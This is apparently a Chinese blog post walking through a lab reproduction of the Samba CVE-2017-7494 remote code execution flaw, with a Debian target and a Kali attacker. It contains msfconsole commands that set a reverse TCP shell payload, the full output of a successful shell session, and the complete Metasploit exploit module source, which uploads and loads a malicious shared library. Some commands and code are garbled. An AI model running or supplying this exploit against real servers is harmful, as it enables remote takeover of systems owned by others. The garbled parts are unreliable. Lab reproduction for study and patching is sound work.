linux smb 漏洞_Samba远程代码执行漏洞的实例详解

最新推荐文章于 2024-07-22 01:51:44 发布
最新推荐文章于 2024-07-22 01:51:44 发布
阅读量1.4k 收藏 1
点赞数 1
文章标签: linux smb 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34887221/article/details/111887481
版权
本文详细介绍了Samba的CVE-2017-7494漏洞,该漏洞允许远程代码执行。受影响的Samba版本为3.5.0至4.6.4/4.5.10/4.4.14。通过复现环境搭建、配置和攻击步骤,展示了如何利用此漏洞在Debian和Kali Linux上进行攻击,最终获取目标系统的root权限。
摘要由CSDN通过智能技术生成

Samba是在Linux和UNIX系统上实现SMB协议的一个软件。

2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。

漏洞简述

▼▼

漏洞编号:CVE-2017-7494

危害等级:严重

影响版本:Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本

漏洞描述:2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

技术分析

▼▼

如官方所描述,该漏洞只需要通过一个可写入的Samba用户权限就可以提权到samba所在服务器的root权限(samba默认是root用户执行的)。

一、复现环境搭建

搭建Debian和kali两个虚拟机: 攻击机:kali (192.168.217.162); 靶机:debian (192.168.217.150)。

二、Debian安装并配置samba

1、首先,下载安装samba服务器# apt-get install samba

2、在debian下创建一个共享目录,我这里为/mnt/shared# mkdir /mnt/shared

3、配置samba服务器的配置文件/etc/samba/smb.conf,在最后添加:[shared]

comment = 'Share for work'

path= /mnt/shared

guest ok = yes

public = yes

writable = yes

create mask = 0777

4、设置/mnt/shared权限# chmod –R /mnt/sspaned

5、重启samba服务# /etc/init.d/samba restart

三、设置攻击机kali

打开kali终端进入到metasploit的exploit目录下的linux文件夹,并新建一个smb文件夹,将攻击脚本放入其中:# cd /usr/share/metasploit-framework/modules/exploits/linux

# mkdir smb

# wget

运行metasploit,开始进行攻击(攻击脚本被我重命名为(cve-2017-7494.rb)# msfconsole

msf > use exploit/linux/smb/cve-2017-7494

msf exploit(cve-2017-7494) > set rhost 192.168.217.150

rhost => 192.168.217.150

msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp

payload => linux/x64/shell/reverse_tcp

msf exploit(cve-2017-7494) > set lhost 192.168.217.162

rhost => 192.168.217.162

msf exploit(cve-2017-7494) > run

[*] Started reverse TCP handler on 192.168.217.162:4444

[*] 192.168.217.150:445 - Using location \\192.168.217.150\shared\ for the path

[*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so

[*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so...

[*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so...

[*] Sending stage (38 bytes) to 192.168.217.150

[*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400

id

uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)

ifconfig

eth0 Link encap:Ethernet HWaddr 00:0c:29:6e:9a:4a

inet addr:192.168.217.150 Bcast:192.168.217.255 Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:6769 errors:0 dropped:0 overruns:0 frame:0

TX packets:700 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:479898 (468.6 KiB) TX bytes:102796 (100.3 KiB)

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:65536 Metric:1

RX packets:35 errors:0 dropped:0 overruns:0 frame:0

TX packets:35 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:3557 (3.4 KiB) TX bytes:3557 (3.4 KiB)

whoami

nobody

POC:

1 ## 2 # This module requires Metasploit: 3 # Current source: 4 ## 5 6 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'Samba is_known_pipename() Arbitrary Module Load', 7 'Description' => %q{ 8 This module triggers an arbitrary shared library load vulnerability 9 in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module 10 requires valid credentials, a writeable folder in an accessible share, 11 and knowledge of the server-side path of the writeable folder. In 12 some cases, anonymous access combined with common filesystem locations 13 can be used to automatically exploit this vulnerability. 14 }, 15 'Author' => 16 [ 17 'steelo ', # Vulnerability Discovery 18 'hdm', # Metasploit Module 19 ], 20 'License' => MSF_LICENSE, 21 'References' => 22 [ 23 [ 'CVE', '2017-7494' ], 24 [ 'URL', '' ], 25 ], 26 'Payload' => 27 { 28 'Space' => 9000, 29 'DisableNops' => true 30 }, 31 'Platform' => 'linux', 32 # 33 # Targets are currently limited by platforms with ELF-SO payload wrappers 34 # 35 'Targets' => 36 [ 37 [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ], 38 [ 'Linux x86', { 'Arch' => ARCH_X86 } ], 39 [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ], 40 # [ 'Linux MIPS', { 'Arch' => MIPS } ], 41 ], 42 'Privileged' => true, 43 'DisclosureDate' => 'Mar 24 2017', 44 'DefaultTarget' => 2)) 45 46 register_options( 47 [ 48 OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), 49 OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), 50 OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), 51 ]) 52 end 53 54 55 def generate_common_locations 56 candidates = [] 57 if datastore['SMB_SHARE_BASE'].to_s.length > 0 58 candidates << datastore['SMB_SHARE_BASE'] 59 end 60 61 %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name| 62 candidates << base_name 63 candidates << [base_name, @share] 64 candidates << [base_name, @share.downcase] 65 candidates << [base_name, @share.upcase] 66 candidates << [base_name, @share.capitalize] 67 candidates << [base_name, @share.gsub(" ", "_")] 68 end 69 70 candidates.uniq 71 end 72 73 def enumerate_directories(share) 74 begin 75 self.simple.connect("\\\\#{rhost}\\#{share}") 76 stuff = self.simple.client.find_first("\\*") 77 directories = [""] 78 stuff.each_pair do |entry,entry_attr| 79 next if %W{. ..}.include?(entry) 80 next unless entry_attr['type'] == 'D' 81 directories << entry end return directories rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e 82 vprint_error("Enum #{share}: #{e}") 83 return nil 84 85 ensure 86 if self.simple.shares["\\\\#{rhost}\\#{share}"] 87 self.simple.disconnect("\\\\#{rhost}\\#{share}") 88 end 89 end 90 end 91 92 def verify_writeable_directory(share, directory="") 93 begin 94 self.simple.connect("\\\\#{rhost}\\#{share}") 95 96 random_filename = Rex::Text.rand_text_alpha(5)+".txt" 97 filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}" 98 99 wfd = simple.open(filename, 'rwct')100 wfd << Rex::Text.rand_text_alpha(8) wfd.close simple.delete(filename) return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e101 vprint_error("Write #{share}#{filename}: #{e}")102 return false103 104 ensure105 if self.simple.shares["\\\\#{rhost}\\#{share}"]106 self.simple.disconnect("\\\\#{rhost}\\#{share}")107 end108 end109 end110 111 def share_type(val)112 [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]113 end114 115 def enumerate_shares_lanman116 shares = []117 begin118 res = self.simple.client.trans(119 "\\PIPE\\LANMAN",120 (121 [0x00].pack('v') +122 "WrLeh\x00" +123 "B13BWz\x00" +124 [0x01, 65406].pack("vv")125 ))126 rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e127 vprint_error("Could not enumerate shares via LANMAN")128 return []129 end130 if res.nil?131 vprint_error("Could not enumerate shares via LANMAN")132 return []133 end134 135 lerror, lconv, lentries, lcount = res['Payload'].to_s[136 res['Payload'].v['ParamOffset'],137 res['Payload'].v['ParamCount']138 ].unpack("v4")139 140 data = res['Payload'].to_s[141 res['Payload'].v['DataOffset'],142 res['Payload'].v['DataCount']143 ]144 145 0.upto(lentries - 1) do |i|146 sname,tmp = data[(i * 20) + 0, 14].split("\x00")147 stype = data[(i * 20) + 14, 2].unpack('v')[0]148 scoff = data[(i * 20) + 16, 2].unpack('v')[0]149 scoff -= lconv if lconv != 0150 scomm,tmp = data[scoff, data.length - scoff].split("\x00")151 shares << [ sname, share_type(stype), scomm] end shares end def probe_module_path(path) begin simple.create_pipe(path) rescue Rex::Proto::SMB::Exceptions::ErrorCode => e152 vprint_error("Probe: #{path}: #{e}")153 end154 end155 156 def find_writeable_path(share)157 subdirs = enumerate_directories(share)158 return unless subdirs159 160 if datastore['SMB_FOLDER'].to_s.length > 0161 subdirs.unshift(datastore['SMB_FOLDER'])162 end163 164 subdirs.each do |subdir|165 next unless verify_writeable_directory(share, subdir)166 return subdir167 end168 169 nil170 end171 172 def find_writeable_share_path173 @path = nil174 share_info = enumerate_shares_lanman175 if datastore['SMB_SHARE_NAME'].to_s.length > 0176 share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']177 end178 179 share_info.each do |share|180 next if share.first.upcase == 'IPC$'181 found = find_writeable_path(share.first)182 next unless found183 @share = share.first184 @path = found185 break186 end187 end188 189 def find_writeable190 find_writeable_share_path191 unless @share && @path192 print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")193 fail_with(Failure::NoTarget, "No matching target")194 end195 print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")196 end197 198 def upload_payload199 begin200 self.simple.connect("\\\\#{rhost}\\#{@share}")201 202 random_filename = Rex::Text.rand_text_alpha(8)+".so"203 filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"204 wfd = simple.open(filename, 'rwct')205 wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}206 )207 wfd.close208 209 @payload_name = random_filename210 return true211 212 rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e213 print_error("Write #{@share}#{filename}: #{e}")214 return false215 216 ensure217 if self.simple.shares["\\\\#{rhost}\\#{@share}"]218 self.simple.disconnect("\\\\#{rhost}\\#{@share}")219 end220 end221 end222 223 def find_payload224 print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")225 226 # Reconnect to IPC$227 simple.connect("\\\\#{rhost}\\IPC$")228 229 #230 # In a perfect world we would find a way make IPC$'s associated CWD231 # change to our share path, which would allow the following code:232 #233 # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")234 #235 236 # Until we find a better way, brute force based on common paths237 generate_common_locations.each do |location|238 target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')239 print_status("Trying location #{target}...")240 probe_module_path(target)241 end242 end243 244 def exploit245 # Setup SMB246 connect247 smb_login248 249 # Find a writeable share250 find_writeable251 252 # Upload the shared library payload253 upload_payload254 255 # Find and execute the payload from the share256 find_payload rescue Rex::StreamClosedError257 258 # Shutdown259 disconnect260 end261 262 end

嘉木也
关注
4.9、漏洞利用 smb-RCE远程命令执行
c10udz的博客
11-12 2657
1.1 samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。1.2 SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器(C/S)型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。1.3 samba监听的端口。
Linux smb漏洞(CVE-2017-7494)复现
自学编程_youkewang.top
04-14 2400
漏洞编号:CVE-2017-7494 漏洞等级:严重 影响版本:漏洞影响了Samba 3.5.0 之后的版本,不包含4.6.4/4.5.10/4.4.140x01:打开samba配置文件添加以下配置。vi /etc/samba/smb.conf0x02:更新MSF后使用"exploit/linux/samba/is_known_pipename"利用模块,设置rhost后直接exploit即可得到...
MS17-010漏洞复现+利用
最新发布
Nove1205的博客
07-22 1383
MS17-010漏洞复现+利用 文章内容仅供学习参考,若用于非法途径,触犯法律后果自负,本人概不负责!!!
Samba 远程命令执行漏洞(CVE-2017-7494)
07-29 4295
Samba 远程命令执行漏洞(CVE-2017-7494)
利用Samba远程代码执行漏洞(CVE-2017-7494)获取shell
qq_54713392的博客
05-08 563
利用Samba远程代码执行漏洞(CVE-2017-7494)获取shell 在ubuntu中找到vulhub靶场Samba中的CVE-2017-7494 运行测试环境:docker-compose up -d 攻击机kali打开msf服务 使用漏洞2017-7494模块 配置目标机IP地址192.168.32.142 执行run命令获取shell 测试权限 ...
mac linux samba服务器配置,linux --> ubuntu和mac通过samba共享
weixin_33754744的博客
05-06 788
ubuntu和mac通过samba共享如果想快速配置,直接跳到第五步。一、安装smb执行下列命令sudo apt-get install sambasudo apt-get install smbfs如果提示找不到软件的话,update,upgrade一次应该就行。二、添加共享文件夹终端中执行shares-admin命令,可能也会提示先装相应的tools,按提示装就行在界面中,先执行unlock操...
samba/cifs详解-基本格式
javon_hzw的专栏
05-14 5210
1.概念 samba是运行于unix/linux的软件。它分为服务器端和客户端,实现了cifs协议描述的功能。用于windows和unix/linux见文件共享 cifs:Windows上的文件共享协议,其前身是smb协议 2.协议详解 2.1 cifs协议头格式 0 1 2 3 4 5 6
CentOS 6.5 Samba服务器 权限配置实例.docx
06-19
Samba 是一款用于在基于 Linux 的操作系统上实现 SMB/CIFS 协议的服务程序,它可以让 Linux 系统与 Windows 系统之间进行文件共享和服务。本文档主要介绍了在 CentOS 6.5 环境下如何配置 Samba 服务器来实现不同部门...
专题资料(2021-2022年)Samba之文件共享配置实例.doc
10-07
Samba文件共享配置实例详解Samba是一个用于在Linux和Windows之间实现文件和打印机共享的软件,它基于SMB/CIFS协议。本配置实例针对一个拥有五个部门(人事行政部、财务部、技术部、市场部、生产部)的公司,...
Samba远程Shell命令注入执行漏洞
weixin_69925635的博客
07-20 228
Samba远程Shell命令注入执行漏洞复现
攻击linuxsamba,Samba 中间人攻击漏洞(CVE-2015-5296)
weixin_33608760的博客
05-17 293
Samba 中间人攻击漏洞(CVE-2015-5296)发布日期:2015-12-19更新日期:2016-01-01受影响系统:Samba Samba 4.x-4.1.22Samba Samba 4.3.x-4.3.3Samba Samba 4.2.x-4.2.7Samba Samba 3.x描述:CVE(CAN) ID: CVE-2015-5296Samba是在Linux和UNIX系统上实现SM...
SMBleed:Windows SMB 协议再被曝严重漏洞
smellycat000的专栏
06-11 846
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队ZecOps公司的安全研究员刚刚披露了影响Server Message Block (SMB)协议的一个新型严重漏洞,它...
未授权访问漏洞总结
weixin_45439698的博客
07-29 5967
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 常见的未授权访问漏洞 1.MongoDB 未授权访问漏洞 2.Redis 未授权访问漏洞 3.Memcached 未授权访问漏洞CVE-2013-7239 4.JBOSS 未授权访问漏洞 5.VNC 未授权访问漏洞 6.Docker 未授权访问漏...
linux samba 不安全,Samba 不安全权限未授权访问漏洞(CVE-2013-1863)
weixin_34024555的博客
05-16 673
发布日期:2013-03-20更新日期:2013-03-21受影响系统:Samba Samba 4.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 58596CVE(CAN) ID: CVE-2013-1863Samba是一套实现SMB(Server M...
未授权漏洞
qq_39541626的博客
03-16 1502
https://www.cnblogs.com/KevinGeorge/p/8921133.html 访问控制类漏洞与隐患 这一类漏洞与隐患属于访问控制与身份鉴别问题,一般有没有配置访问控制、访问控制弱(弱口令或者空口令),身份鉴别可以绕过等问题 漏洞协议组件 漏洞类型 漏洞评级 SSH 弱口令 严重 RDP 未授权、弱口令 严重 SMB 未授权(共享直接访问,不验证)、弱口令 严...
linuxsmb漏洞利用,Samba trans2open Overflow (Linux x86) - 婕忔礊鍒╃敤 - 0day,Exploit,Shellcode...
weixin_42160398的博客
05-24 446
### $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# ...
Samba任意代码执行漏洞的危害
06-10
Samba是一种在Linux和UNIX系统上运行的开源软件,用于实现文件和打印机共享。如果Samba服务器存在任意代码执行漏洞攻击者可以通过该漏洞在服务器上执行恶意代码,从而带来以下危害: 1. 数据泄露:攻击者可以利用漏洞窃取服务器上存储的敏感数据,如用户密码、金融信息等。 2. 操作系统受控:攻击者可以通过漏洞获取操作系统的控制权,从而修改或删除重要文件,破坏系统的稳定性和完整性。 3. 网络攻击攻击者可以利用漏洞控制服务器,并将其作为跳板攻击其他网络资源,造成更广泛的攻击。 4. 恶意软件传播:攻击者可以通过漏洞在服务器上安装恶意软件,将其传播到其他系统,造成更大的安全威胁。 因此,管理员应该定期更新Samba软件,以修复可能存在的漏洞,并限制Samba服务器的访问权限,确保只有授权用户才能访问服务器。此外,还应该定期监控Samba服务器的安全状态,及时发现并处理安全事件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值